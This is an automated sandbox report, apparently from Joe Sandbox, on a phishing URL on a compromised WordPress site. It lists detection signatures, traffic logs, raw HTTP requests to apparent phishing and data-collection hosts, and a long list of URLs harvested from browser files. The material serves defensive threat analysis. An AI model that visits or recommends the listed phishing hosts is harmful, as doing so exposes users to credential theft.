Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://handymanproservices.com/wp-includes/

Overview

General Information

Sample URL:https://handymanproservices.com/wp-includes/
Analysis ID:1612221
Infos:

Detection

HTMLPhisher
Score:52
Range:0 - 100
Confidence:100%

Signatures

Yara detected HtmlPhish10
AI detected suspicious Javascript
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML title does not match URL

Classification

  • System is w10x64
  • chrome.exe (PID: 3180 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 6820 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2668 --field-trial-handle=2004,i,11872680787361419669,16306306468207195550,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 5236 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://handymanproservices.com/wp-includes/" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_61JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    SourceRuleDescriptionAuthorStrings
    1.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: Yara matchFile source: 1.0.pages.csv, type: HTML
      Source: Yara matchFile source: dropped/chromecache_61, type: DROPPED
      Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://8l.dichotomou8.com/bQpOadeMo/#Xws924g@jaip... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser developer tools, and redirecting the user to an unrelated website. These behaviors are highly suspicious and indicate potential malicious intent, such as preventing analysis or redirecting users to a phishing site.
      Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://8l.dichotomou8.com/bQpOadeMo/#Xws924g@jaip... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It attempts to detect and block common security tools, redirects to a suspicious domain, and performs aggressive DOM manipulation. These factors indicate a high likelihood of malicious intent, warranting a high-risk score.
      Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://8l.dichotomou8.com/bQpOadeMo/#Xws924g@jaip... This script demonstrates high-risk behavior, including dynamic code execution through the use of the `eval` function. It also appears to be heavily obfuscated, which is a common tactic used to conceal malicious intent. The combination of these factors indicates a high likelihood of malicious activity, and this script should be treated with extreme caution.
      Source: https://handymanproservices.com/wp-includes/HTTP Parser: Number of links: 0
      Source: https://handymanproservices.com/wp-includes/HTTP Parser: Title: ****---*** does not match URL
      Source: https://handymanproservices.com/wp-includes/HTTP Parser: No favicon
      Source: https://8l.dichotomou8.com/bQpOadeMo/#Xws924g@jaip.orgHTTP Parser: No favicon
      Source: https://8l.dichotomou8.com/bQpOadeMo/#contactHTTP Parser: No favicon
      Source: https://handymanproservices.com/wp-includes/HTTP Parser: No <meta name="author".. found
      Source: https://handymanproservices.com/wp-includes/HTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49757 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:58150 version: TLS 1.2
      Source: global trafficTCP traffic: 192.168.2.6:58147 -> 1.1.1.1:53
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
      Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.36
      Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.36
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.4
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /wp-includes/ HTTP/1.1Host: handymanproservices.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: handymanproservices.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://handymanproservices.com/wp-includes/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bQpOadeMo/ HTTP/1.1Host: 8l.dichotomou8.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://handymanproservices.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://8l.dichotomou8.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://8l.dichotomou8.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://8l.dichotomou8.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/8a57887573f2/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://8l.dichotomou8.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/8a57887573f2/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://8l.dichotomou8.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=1jF8wpEM2E_ivoh.EQrBozsaGXiAJpog1IOGTMqA3iU-1739287634-1.0.1.1-F_nJF1_3gxGpWwkjwcFmgquLuoTMou2soOs3U.ahD0JoEnibhlwY8N3rv0atQaKsR2JQFNCvU2gus4Jnv1JO1w
      Source: global trafficHTTP traffic detected: GET /loray@la8j4pj HTTP/1.1Host: ajcs6.revishbos.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://8l.dichotomou8.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://8l.dichotomou8.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /loray@la8j4pj HTTP/1.1Host: ajcs6.revishbos.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: handymanproservices.com
      Source: global trafficDNS traffic detected: DNS query: 8l.dichotomou8.com
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: developers.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: ajcs6.revishbos.ru
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 11 Feb 2025 15:26:56 GMTserver: LiteSpeedvary: User-Agentx-turbo-charged-by: LiteSpeedconnection: close
      Source: sets.json.1.drString found in binary or memory: https://07c225f3.online
      Source: sets.json.1.drString found in binary or memory: https://24.hu
      Source: sets.json.1.drString found in binary or memory: https://aajtak.in
      Source: sets.json.1.drString found in binary or memory: https://abczdrowie.pl
      Source: sets.json.1.drString found in binary or memory: https://alice.tw
      Source: sets.json.1.drString found in binary or memory: https://ambitionbox.com
      Source: sets.json.1.drString found in binary or memory: https://autobild.de
      Source: sets.json.1.drString found in binary or memory: https://baomoi.com
      Source: sets.json.1.drString found in binary or memory: https://bild.de
      Source: sets.json.1.drString found in binary or memory: https://blackrock.com
      Source: sets.json.1.drString found in binary or memory: https://blackrockadvisorelite.it
      Source: sets.json.1.drString found in binary or memory: https://bluradio.com
      Source: sets.json.1.drString found in binary or memory: https://bolasport.com
      Source: sets.json.1.drString found in binary or memory: https://bonvivir.com
      Source: sets.json.1.drString found in binary or memory: https://bumbox.com
      Source: sets.json.1.drString found in binary or memory: https://businessinsider.com.pl
      Source: sets.json.1.drString found in binary or memory: https://businesstoday.in
      Source: sets.json.1.drString found in binary or memory: https://cachematrix.com
      Source: sets.json.1.drString found in binary or memory: https://cafemedia.com
      Source: sets.json.1.drString found in binary or memory: https://caracoltv.com
      Source: sets.json.1.drString found in binary or memory: https://carcostadvisor.be
      Source: sets.json.1.drString found in binary or memory: https://carcostadvisor.com
      Source: sets.json.1.drString found in binary or memory: https://carcostadvisor.fr
      Source: sets.json.1.drString found in binary or memory: https://cardsayings.net
      Source: sets.json.1.drString found in binary or memory: https://chatbot.com
      Source: sets.json.1.drString found in binary or memory: https://chennien.com
      Source: sets.json.1.drString found in binary or memory: https://citybibleforum.org
      Source: sets.json.1.drString found in binary or memory: https://clarosports.com
      Source: sets.json.1.drString found in binary or memory: https://clmbtech.com
      Source: sets.json.1.drString found in binary or memory: https://closeronline.co.uk
      Source: sets.json.1.drString found in binary or memory: https://clubelpais.com.uy
      Source: sets.json.1.drString found in binary or memory: https://cmxd.com.mx
      Source: sets.json.1.drString found in binary or memory: https://cognitive-ai.ru
      Source: sets.json.1.drString found in binary or memory: https://cognitiveai.ru
      Source: sets.json.1.drString found in binary or memory: https://commentcamarche.com
      Source: sets.json.1.drString found in binary or memory: https://commentcamarche.net
      Source: sets.json.1.drString found in binary or memory: https://computerbild.de
      Source: sets.json.1.drString found in binary or memory: https://content-loader.com
      Source: sets.json.1.drString found in binary or memory: https://cookreactor.com
      Source: sets.json.1.drString found in binary or memory: https://cricbuzz.com
      Source: sets.json.1.drString found in binary or memory: https://css-load.com
      Source: sets.json.1.drString found in binary or memory: https://deccoria.pl
      Source: sets.json.1.drString found in binary or memory: https://deere.com
      Source: sets.json.1.drString found in binary or memory: https://desimartini.com
      Source: sets.json.1.drString found in binary or memory: https://dewarmsteweek.be
      Source: sets.json.1.drString found in binary or memory: https://drimer.io
      Source: sets.json.1.drString found in binary or memory: https://drimer.travel
      Source: sets.json.1.drString found in binary or memory: https://economictimes.com
      Source: sets.json.1.drString found in binary or memory: https://een.be
      Source: sets.json.1.drString found in binary or memory: https://efront.com
      Source: sets.json.1.drString found in binary or memory: https://eleconomista.net
      Source: sets.json.1.drString found in binary or memory: https://elfinancierocr.com
      Source: sets.json.1.drString found in binary or memory: https://elgrafico.com
      Source: sets.json.1.drString found in binary or memory: https://ella.sv
      Source: sets.json.1.drString found in binary or memory: https://elpais.com.uy
      Source: sets.json.1.drString found in binary or memory: https://elpais.uy
      Source: sets.json.1.drString found in binary or memory: https://etfacademy.it
      Source: sets.json.1.drString found in binary or memory: https://eworkbookcloud.com
      Source: sets.json.1.drString found in binary or memory: https://eworkbookrequest.com
      Source: sets.json.1.drString found in binary or memory: https://fakt.pl
      Source: sets.json.1.drString found in binary or memory: https://finn.no
      Source: sets.json.1.drString found in binary or memory: https://firstlook.biz
      Source: chromecache_69.3.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3-UBGEe.woff2)
      Source: chromecache_69.3.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3CUBGEe.woff2)
      Source: chromecache_69.3.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3GUBGEe.woff2)
      Source: chromecache_69.3.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3KUBGEe.woff2)
      Source: chromecache_69.3.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3OUBGEe.woff2)
      Source: chromecache_69.3.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3iUBGEe.woff2)
      Source: chromecache_69.3.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3yUBA.woff2)
      Source: chromecache_69.3.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMawCUBGEe.woff2)
      Source: chromecache_69.3.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMaxKUBGEe.woff2)
      Source: sets.json.1.drString found in binary or memory: https://gallito.com.uy
      Source: sets.json.1.drString found in binary or memory: https://geforcenow.com
      Source: sets.json.1.drString found in binary or memory: https://gettalkdesk.com
      Source: sets.json.1.drString found in binary or memory: https://gliadomain.com
      Source: sets.json.1.drString found in binary or memory: https://gnttv.com
      Source: sets.json.1.drString found in binary or memory: https://graziadaily.co.uk
      Source: sets.json.1.drString found in binary or memory: https://grid.id
      Source: sets.json.1.drString found in binary or memory: https://gridgames.app
      Source: sets.json.1.drString found in binary or memory: https://growthrx.in
      Source: sets.json.1.drString found in binary or memory: https://grupolpg.sv
      Source: sets.json.1.drString found in binary or memory: https://gujaratijagran.com
      Source: sets.json.1.drString found in binary or memory: https://hapara.com
      Source: sets.json.1.drString found in binary or memory: https://hazipatika.com
      Source: sets.json.1.drString found in binary or memory: https://hc1.com
      Source: sets.json.1.drString found in binary or memory: https://hc1.global
      Source: sets.json.1.drString found in binary or memory: https://hc1cas.com
      Source: sets.json.1.drString found in binary or memory: https://hc1cas.global
      Source: sets.json.1.drString found in binary or memory: https://healthshots.com
      Source: sets.json.1.drString found in binary or memory: https://hearty.app
      Source: sets.json.1.drString found in binary or memory: https://hearty.gift
      Source: sets.json.1.drString found in binary or memory: https://hearty.me
      Source: sets.json.1.drString found in binary or memory: https://heartymail.com
      Source: sets.json.1.drString found in binary or memory: https://heatworld.com
      Source: sets.json.1.drString found in binary or memory: https://helpdesk.com
      Source: sets.json.1.drString found in binary or memory: https://hindustantimes.com
      Source: sets.json.1.drString found in binary or memory: https://hj.rs
      Source: sets.json.1.drString found in binary or memory: https://hjck.com
      Source: sets.json.1.drString found in binary or memory: https://html-load.cc
      Source: sets.json.1.drString found in binary or memory: https://html-load.com
      Source: sets.json.1.drString found in binary or memory: https://human-talk.org
      Source: sets.json.1.drString found in binary or memory: https://idbs-cloud.com
      Source: sets.json.1.drString found in binary or memory: https://idbs-dev.com
      Source: sets.json.1.drString found in binary or memory: https://idbs-eworkbook.com
      Source: sets.json.1.drString found in binary or memory: https://idbs-staging.com
      Source: sets.json.1.drString found in binary or memory: https://img-load.com
      Source: sets.json.1.drString found in binary or memory: https://indiatimes.com
      Source: sets.json.1.drString found in binary or memory: https://indiatoday.in
      Source: sets.json.1.drString found in binary or memory: https://indiatodayne.in
      Source: sets.json.1.drString found in binary or memory: https://infoedgeindia.com
      Source: sets.json.1.drString found in binary or memory: https://interia.pl
      Source: sets.json.1.drString found in binary or memory: https://intoday.in
      Source: sets.json.1.drString found in binary or memory: https://iolam.it
      Source: sets.json.1.drString found in binary or memory: https://ishares.com
      Source: sets.json.1.drString found in binary or memory: https://jagran.com
      Source: sets.json.1.drString found in binary or memory: https://johndeere.com
      Source: sets.json.1.drString found in binary or memory: https://journaldesfemmes.com
      Source: sets.json.1.drString found in binary or memory: https://journaldesfemmes.fr
      Source: sets.json.1.drString found in binary or memory: https://journaldunet.com
      Source: sets.json.1.drString found in binary or memory: https://journaldunet.fr
      Source: sets.json.1.drString found in binary or memory: https://joyreactor.cc
      Source: sets.json.1.drString found in binary or memory: https://joyreactor.com
      Source: sets.json.1.drString found in binary or memory: https://kaksya.in
      Source: sets.json.1.drString found in binary or memory: https://knowledgebase.com
      Source: sets.json.1.drString found in binary or memory: https://kompas.com
      Source: sets.json.1.drString found in binary or memory: https://kompas.tv
      Source: sets.json.1.drString found in binary or memory: https://kompasiana.com
      Source: sets.json.1.drString found in binary or memory: https://lanacion.com.ar
      Source: sets.json.1.drString found in binary or memory: https://landyrev.com
      Source: sets.json.1.drString found in binary or memory: https://landyrev.ru
      Source: sets.json.1.drString found in binary or memory: https://laprensagrafica.com
      Source: sets.json.1.drString found in binary or memory: https://lateja.cr
      Source: sets.json.1.drString found in binary or memory: https://libero.it
      Source: sets.json.1.drString found in binary or memory: https://linternaute.com
      Source: sets.json.1.drString found in binary or memory: https://linternaute.fr
      Source: sets.json.1.drString found in binary or memory: https://livechat.com
      Source: sets.json.1.drString found in binary or memory: https://livechatinc.com
      Source: sets.json.1.drString found in binary or memory: https://livehindustan.com
      Source: sets.json.1.drString found in binary or memory: https://livemint.com
      Source: sets.json.1.drString found in binary or memory: https://max.auto
      Source: sets.json.1.drString found in binary or memory: https://medonet.pl
      Source: sets.json.1.drString found in binary or memory: https://meo.pt
      Source: sets.json.1.drString found in binary or memory: https://mercadolibre.cl
      Source: sets.json.1.drString found in binary or memory: https://mercadolibre.co.cr
      Source: sets.json.1.drString found in binary or memory: https://mercadolibre.com
      Source: sets.json.1.drString found in binary or memory: https://mercadolibre.com.ar
      Source: sets.json.1.drString found in binary or memory: https://mercadolibre.com.bo
      Source: sets.json.1.drString found in binary or memory: https://mercadolibre.com.co
      Source: sets.json.1.drString found in binary or memory: https://mercadolibre.com.do
      Source: sets.json.1.drString found in binary or memory: https://mercadolibre.com.ec
      Source: sets.json.1.drString found in binary or memory: https://mercadolibre.com.gt
      Source: sets.json.1.drString found in binary or memory: https://mercadolibre.com.hn
      Source: sets.json.1.drString found in binary or memory: https://mercadolibre.com.mx
      Source: sets.json.1.drString found in binary or memory: https://mercadolibre.com.ni
      Source: sets.json.1.drString found in binary or memory: https://mercadolibre.com.pa
      Source: sets.json.1.drString found in binary or memory: https://mercadolibre.com.pe
      Source: sets.json.1.drString found in binary or memory: https://mercadolibre.com.py
      Source: sets.json.1.drString found in binary or memory: https://mercadolibre.com.sv
      Source: sets.json.1.drString found in binary or memory: https://mercadolibre.com.uy
      Source: sets.json.1.drString found in binary or memory: https://mercadolibre.com.ve
      Source: sets.json.1.drString found in binary or memory: https://mercadolivre.com
      Source: sets.json.1.drString found in binary or memory: https://mercadolivre.com.br
      Source: sets.json.1.drString found in binary or memory: https://mercadopago.cl
      Source: sets.json.1.drString found in binary or memory: https://mercadopago.com
      Source: sets.json.1.drString found in binary or memory: https://mercadopago.com.ar
      Source: sets.json.1.drString found in binary or memory: https://mercadopago.com.br
      Source: sets.json.1.drString found in binary or memory: https://mercadopago.com.co
      Source: sets.json.1.drString found in binary or memory: https://mercadopago.com.ec
      Source: sets.json.1.drString found in binary or memory: https://mercadopago.com.mx
      Source: sets.json.1.drString found in binary or memory: https://mercadopago.com.pe
      Source: sets.json.1.drString found in binary or memory: https://mercadopago.com.uy
      Source: sets.json.1.drString found in binary or memory: https://mercadopago.com.ve
      Source: sets.json.1.drString found in binary or memory: https://mercadoshops.cl
      Source: sets.json.1.drString found in binary or memory: https://mercadoshops.com
      Source: sets.json.1.drString found in binary or memory: https://mercadoshops.com.ar
      Source: sets.json.1.drString found in binary or memory: https://mercadoshops.com.br
      Source: sets.json.1.drString found in binary or memory: https://mercadoshops.com.co
      Source: sets.json.1.drString found in binary or memory: https://mercadoshops.com.mx
      Source: sets.json.1.drString found in binary or memory: https://mighty-app.appspot.com
      Source: sets.json.1.drString found in binary or memory: https://mightytext.net
      Source: sets.json.1.drString found in binary or memory: https://mittanbud.no
      Source: sets.json.1.drString found in binary or memory: https://money.pl
      Source: sets.json.1.drString found in binary or memory: https://motherandbaby.com
      Source: sets.json.1.drString found in binary or memory: https://mystudentdashboard.com
      Source: sets.json.1.drString found in binary or memory: https://nacion.com
      Source: sets.json.1.drString found in binary or memory: https://naukri.com
      Source: sets.json.1.drString found in binary or memory: https://nidhiacademyonline.com
      Source: sets.json.1.drString found in binary or memory: https://nien.co
